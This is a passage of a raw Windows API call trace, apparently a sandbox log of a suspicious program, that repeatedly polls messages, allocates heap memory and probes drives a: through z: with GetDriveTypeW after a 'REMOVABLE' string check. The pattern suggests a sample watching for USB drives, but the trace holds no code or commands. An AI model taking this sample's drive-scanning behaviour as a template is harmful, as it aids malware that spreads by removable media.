wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.350] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0214.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.350] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0214.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0214.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.350] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0214.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.351] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.351] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.351] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.351] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.351] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.351] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.351] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0214.351] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0214.351] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.351] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.351] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.351] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.351] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.352] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.352] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.352] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.352] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.352] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.353] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.353] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.353] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.353] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.354] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.354] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.354] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.354] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.354] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.355] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.355] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.355] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.355] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.356] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.356] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.356] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.356] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.356] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0214.356] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0214.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0214.357] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0214.357] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.357] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0214.357] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.357] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.357] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.357] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0214.357] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.357] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0214.357] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0214.357] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0214.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0214.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0214.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0214.358] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0214.358] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0214.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0214.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.358] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0214.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0214.358] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0214.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.358] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.359] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0214.359] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.359] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.359] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0214.359] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.359] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.359] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0214.359] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0214.359] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.359] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.359] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.359] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0214.359] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.359] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.359] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.359] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.360] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.360] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.360] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.360] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.360] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.361] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.361] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.361] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.361] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.361] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.362] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.362] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.362] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.362] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.362] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.362] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.363] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.363] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.363] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.364] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.364] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.364] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.364] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.364] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0214.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.365] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.365] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.365] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0214.365] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.365] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.365] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.365] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.365] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.365] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0214.365] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0214.365] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.365] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0214.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0214.366] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0214.366] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.366] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0214.366] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.366] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.366] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.366] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.366] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.366] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.366] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.366] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0214.366] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.366] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.366] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.367] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.367] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0214.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.367] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.367] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.367] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0214.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0214.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.367] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0214.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0214.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.367] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0214.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.367] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.367] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.368] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.368] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.368] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.368] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.368] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.368] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.369] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.369] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.369] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.369] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.517] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.517] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.517] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.517] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.517] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.517] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.517] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.518] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.518] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.518] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.518] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.518] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.518] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.518] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.519] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0214.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0214.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.519] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0214.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0214.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0214.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.519] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0214.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0214.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.520] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0214.520] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0214.520] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0214.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.520] 